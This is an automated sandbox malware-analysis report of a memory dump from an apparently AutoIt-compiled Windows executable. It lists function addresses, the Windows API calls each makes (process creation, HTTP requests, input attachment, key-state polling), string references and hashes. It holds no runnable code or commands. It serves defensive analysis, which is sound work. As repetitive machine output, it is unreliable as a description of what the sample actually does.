Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconLoad
String ID: ,z,0z,$,z,0z,$blank$info$question$stop$warning
API String ID: 2457776203-2323825991
Opcode ID: 7956e66e86c8a9c3b981ecde0922c8233495d37e32eae31f5ccb2663955cb395
Instruction ID: c61b6606b0a5c108d190955713ae8ee207732b3faba1085c72eb04a8979d5681
Opcode Fuzzy Hash: 7956e66e86c8a9c3b981ecde0922c8233495d37e32eae31f5ccb2663955cb395
Instruction Fuzzy Hash: 83112B31638327BEA701DE58EC82CAA779CDF0E360B60001BF50567181E7E46FB049A0

Function 00259B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0025B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0025B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00259BCC
GetDlgCtrlID.USER32 ref: 00259BD7
GetParent.USER32 ref: 00259BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00259BF6
GetDlgCtrlID.USER32(?), ref: 00259BFF
GetParent.USER32(?), ref: 00259C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00259C1E

Strings

ComboBox, xrefs: 00259B54
ListBox, xrefs: 00259B89

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: fc3df6da83585078298064d740c3c6bf8f0caa9c29cfd2d0ba0d6509e30ed137
Instruction ID: 53a6850a9534b6fe72001c47c46da3a90fb9b525ba5ffd02e1bd819ffb146620
Opcode Fuzzy Hash: fc3df6da83585078298064d740c3c6bf8f0caa9c29cfd2d0ba0d6509e30ed137
Instruction Fuzzy Hash: EF21B071910108AFDF14EB60DC89EFEBBA9EF99311F100116FD6193291DB7489789F24

Function 00259C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0025B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0025B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00259CB5
GetDlgCtrlID.USER32 ref: 00259CC0
GetParent.USER32 ref: 00259CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00259CDF
GetDlgCtrlID.USER32(?), ref: 00259CE8
GetParent.USER32(?), ref: 00259D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00259D07

Strings

ComboBox, xrefs: 00259C3F
ListBox, xrefs: 00259C74

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 0872ac08c9c60296239d28235cca3efe0e275c181fb0da70f07f3c80a3a0233e
Instruction ID: b4611d5c8d0ec117c549a882b09b0fe59bc30c47aab12c91745382c745e95173
Opcode Fuzzy Hash: 0872ac08c9c60296239d28235cca3efe0e275c181fb0da70f07f3c80a3a0233e
Instruction Fuzzy Hash: 8721BD72A11108AFDF10ABA0CC89EFEBBB9EF99301F100016BD5193291DB7589789F24

Function 00259D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00259D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00259D3C
_wcscmp.LIBCMT ref: 00259D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00259DC9

Strings

largeicons, xrefs: 00259D5D
list, xrefs: 00259DAB
SHELLDLL_DefView, xrefs: 00259D48
smallicons, xrefs: 00259D91
details, xrefs: 00259D77

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 7d54d6abb4dfe189b081d8a01192380d8648f10b76f9b53cdff6c67462f13bc3
Instruction ID: 80c8e05cb627f0201c4fc26c452cebc435817b60b0892c8b68ba63951aa2ba89
Opcode Fuzzy Hash: 7d54d6abb4dfe189b081d8a01192380d8648f10b76f9b53cdff6c67462f13bc3
Instruction Fuzzy Hash: CF113A76668327FDF6103624FC06DE673ACDB02361B200013FD04A40D1FAB66AB54E58

Function 00278F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00278FC1
CoInitialize.OLE32(00000000), ref: 00278FEE
CoUninitialize.OLE32 ref: 00278FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 002790F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00279225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00293BDC), ref: 00279259
CoGetObject.OLE32(?,00000000,00293BDC,?), ref: 0027927C
SetErrorMode.KERNEL32(00000000), ref: 0027928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0027930F
VariantClear.OLEAUT32(?), ref: 0027931F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: ad9d6f06716d7ac505c631bdb98cea28560a8677ef9a0d73ca4238cd08d59f8d
Instruction ID: 08de7c4d37974ec12437480e74abd7593992663f2d0847a0ab9c649a7ad555f0
Opcode Fuzzy Hash: ad9d6f06716d7ac505c631bdb98cea28560a8677ef9a0d73ca4238cd08d59f8d
Instruction Fuzzy Hash: 0DC146B1228305AFD700EF68C88492BB7E9FF89708F00895DF9899B251DB71ED55CB52

Function 002619CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002619EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00260A67,?,00000001), ref: 00261A03
GetWindowThreadProcessId.USER32(00000000), ref: 00261A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00260A67,?,00000001), ref: 00261A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00261A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00260A67,?,00000001), ref: 00261A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00260A67,?,00000001), ref: 00261A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00260A67,?,00000001), ref: 00261A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00260A67,?,00000001), ref: 00261AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00260A67,?,00000001), ref: 00261ABB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 003f63e133942f4ce5b938a2d1095eaafdc4d040836f179c118eab3fe8c60105
Instruction ID: b9a757d82012bb726277d7393409ecc171e185964aa62c6395af2906bf94492b
Opcode Fuzzy Hash: 003f63e133942f4ce5b938a2d1095eaafdc4d040836f179c118eab3fe8c60105
Instruction Fuzzy Hash: B231A271521209BFDB10DF94EC8CFAA77AEEF64315F54811AF900C6590DBB4ADA0CB90

Function 0023C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0020260D
SetTextColor.GDI32(?,000000FF), ref: 00202617
SetBkMode.GDI32(?,00000001), ref: 0020262C
GetStockObject.GDI32(00000005), ref: 00202634
GetClientRect.USER32(?), ref: 0023C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 0023C113
GetWindowDC.USER32(?), ref: 0023C11F
GetPixel.GDI32(00000000,?,?), ref: 0023C12E
ReleaseDC.USER32(?,00000000), ref: 0023C140
GetSysColor.USER32(00000005), ref: 0023C15E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 1749ae41d116bd254c7b37ed807b02f94e97bc3b044224ab169a2e84b4f09c35
Instruction ID: 16e85f924e17e0893cc4a8fd3a61f646e9d274fccf69c694747b5a8b73fcd498
Opcode Fuzzy Hash: 1749ae41d116bd254c7b37ed807b02f94e97bc3b044224ab169a2e84b4f09c35
Instruction Fuzzy Hash: 70116A32510209FFDB615FA4EC8CBA97BA5EF08321F504222FA69950E2CB310961EF10

Function 0020AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0020ADE1
OleUninitialize.OLE32(?,00000000), ref: 0020AE80
UnregisterHotKey.USER32(?), ref: 0020AFD7
DestroyWindow.USER32(?), ref: 00242F64
FreeLibrary.KERNEL32(?), ref: 00242FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00242FF6

Strings

close all, xrefs: 0020ADDC

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ac553f95dcbc3b79cba8e450663222ea32ed6dc493f28bd4fc00c2db76feafa8
Instruction ID: c9cf9a43c69491339e8d9eb2a4d1510a439858e6c5d785e67ffc54331e1e63a3
Opcode Fuzzy Hash: ac553f95dcbc3b79cba8e450663222ea32ed6dc493f28bd4fc00c2db76feafa8
Instruction Fuzzy Hash: 06A16070721213CFCB29EF54C499A69F764BF14700F5142ADE80AAB692CB31AD76CF91

Function 0025AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0025B13A), ref: 0025B078

Strings

NAME, xrefs: 0025AEAA
INSTANCE, xrefs: 0025AF86
REGEXPCLASS, xrefs: 0025AE3D
TEXT, xrefs: 0025AFAF
CLASS, xrefs: 0025ADF7
CLASSNN, xrefs: 0025AE1A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: ed645a81dbefd174882b2b3e9810e906733db5a5a8b796343050070dad1cad01
Instruction ID: 1c5ab1ac9e5cd8d085a23e78704f5ecbb49341b931b3a6d9ca4db0c27a2db976
Opcode Fuzzy Hash: ed645a81dbefd174882b2b3e9810e906733db5a5a8b796343050070dad1cad01
Instruction Fuzzy Hash: EA91B570520116EACB18DFA0C482BEEFB75BF04301F508119ED5AA7291DF3169BDCBA5

Function 002031F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0020327E

Part of subcall function 0020218F: GetClientRect.USER32(?,?), ref: 002021B8
Part of subcall function 0020218F: GetWindowRect.USER32(?,?), ref: 002021F9
Part of subcall function 0020218F: ScreenToClient.USER32(?,?), ref: 00202221

GetDC.USER32 ref: 0023D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0023D086
SelectObject.GDI32(00000000,00000000), ref: 0023D094
SelectObject.GDI32(00000000,00000000), ref: 0023D0A9
ReleaseDC.USER32(?,00000000), ref: 0023D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0023D13C

Strings

U, xrefs: 0023D011

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: db66e8292a331606ba81706faac331642535c8146e34b136eec9a16b82ec057f
Instruction ID: 1574b7a86e5cc251b405811afc9334590654efbe1b39400267f513f12b085ef8
Opcode Fuzzy Hash: db66e8292a331606ba81706faac331642535c8146e34b136eec9a16b82ec057f
Instruction Fuzzy Hash: 6771347042420ADFCF25DF64EC84AAA7BB9FF49320F14426AED955A1A6C7318C61DF60

Function 0028C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

Part of subcall function 00202714: GetCursorPos.USER32(?), ref: 00202727
Part of subcall function 00202714: ScreenToClient.USER32(002C77B0,?), ref: 00202744
Part of subcall function 00202714: GetAsyncKeyState.USER32(00000001), ref: 00202769
Part of subcall function 00202714: GetAsyncKeyState.USER32(00000002), ref: 00202777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0028C69C
ImageList_EndDrag.COMCTL32 ref: 0028C6A2
ReleaseCapture.USER32 ref: 0028C6A8
SetWindowTextW.USER32(?,00000000), ref: 0028C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0028C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0028C847

Strings

@GUI_DROPID, xrefs: 0028C799
@GUI_DRAGFILE, xrefs: 0028C7DC

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: bf5937c5a48060522df648be9566354d5e9ab9c10840e15afcbbdecd3067fb11
Instruction ID: ad39f1327584697a74477fd2a81ece2ede023e5cb06af878c9c51cb50822b5c0
Opcode Fuzzy Hash: bf5937c5a48060522df648be9566354d5e9ab9c10840e15afcbbdecd3067fb11
Instruction Fuzzy Hash: B8519A74618305AFD700EF14DC99FAA7BE5EB84310F10861DFA95872E2CB70A964DF62

Function 002720E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00272148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0027218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0027219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002721AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002721DC
InternetCloseHandle.WININET(00000000), ref: 00272223

Part of subcall function 00272B4F: GetLastError.KERNEL32(?,?,00271EE3,00000000,00000000,00000001), ref: 00272B64
Part of subcall function 00272B4F: SetEvent.KERNEL32(?,?,00271EE3,00000000,00000000,00000001), ref: 00272B79

Strings

, xrefs: 002721CD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 709eb6ce67081ed9bf5268a9439abe98e1ab19ac3f8177ea447f8b00928ad81e
Instruction ID: 33f41788df3616c5bcba378a1c466b4f63148563796c6d029d891ee8846871ff
Opcode Fuzzy Hash: 709eb6ce67081ed9bf5268a9439abe98e1ab19ac3f8177ea447f8b00928ad81e
Instruction Fuzzy Hash: 60415CB1510219BEEB129F50DC89FBB7BACFB08354F008116FE099A152D770DE588BA0

Function 00279330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00290980), ref: 00279412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00290980), ref: 00279446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002795C0
SysFreeString.OLEAUT32(?), ref: 002795EA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 4dcc33083202942de08423940f71909b3d2cfe182baf61e96d573c067cba613d
Instruction ID: 91278cdc606f7f329d1dba0a25548ce03f697eb37b234d50d160cd123f09b9cb
Opcode Fuzzy Hash: 4dcc33083202942de08423940f71909b3d2cfe182baf61e96d573c067cba613d
Instruction Fuzzy Hash: 42F12A71A20219EFCF14DF94C888EAEB7B9FF45315F108058F91AAB251CB31AE95CB50

Function 0027FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0027FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0027FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0027FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0027FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00280133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00280165
CloseHandle.KERNEL32(?), ref: 00280194
CloseHandle.KERNEL32(?), ref: 0028020B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 03c7b13828e6fd4cf66b7886fed301e5e61c4a623a1cb79e893d0a9016a73bd5
Instruction ID: e6ceb3c0bfffb63038a94b4974460ba1b405f04188aa381a00904eef2557bf39
Opcode Fuzzy Hash: 03c7b13828e6fd4cf66b7886fed301e5e61c4a623a1cb79e893d0a9016a73bd5
Instruction Fuzzy Hash: F9E1CE31228301DFC754EF24C881A6ABBE1AF85314F14856DF9999B2E2CB71EC65CF52

Function 0026527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00264BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00263B8A,?), ref: 00264BE0

Part of subcall function 00264BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00263B8A,?), ref: 00264BF9

Part of subcall function 00264FEC: GetFileAttributesW.KERNEL32(?,00263BFE), ref: 00264FED

lstrcmpiW.KERNEL32(?,?), ref: 002652FB
_wcscmp.LIBCMT ref: 00265315
MoveFileW.KERNEL32(?,?), ref: 00265330

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 384ab0c3ee232a42738eefc20cb8fcc48c41542b141b437fe69bb3cff3d03d83
Instruction ID: 790d50e5802e496070fc2de17920169b5a88f882e42590b0f95d9391959f8b36
Opcode Fuzzy Hash: 384ab0c3ee232a42738eefc20cb8fcc48c41542b141b437fe69bb3cff3d03d83
Instruction Fuzzy Hash: 4F5175B2018355ABC764EF90D8819DBB7EC9F84340F50091EB589C3151EF74A6D8CB56

Function 00288C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00288D24

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

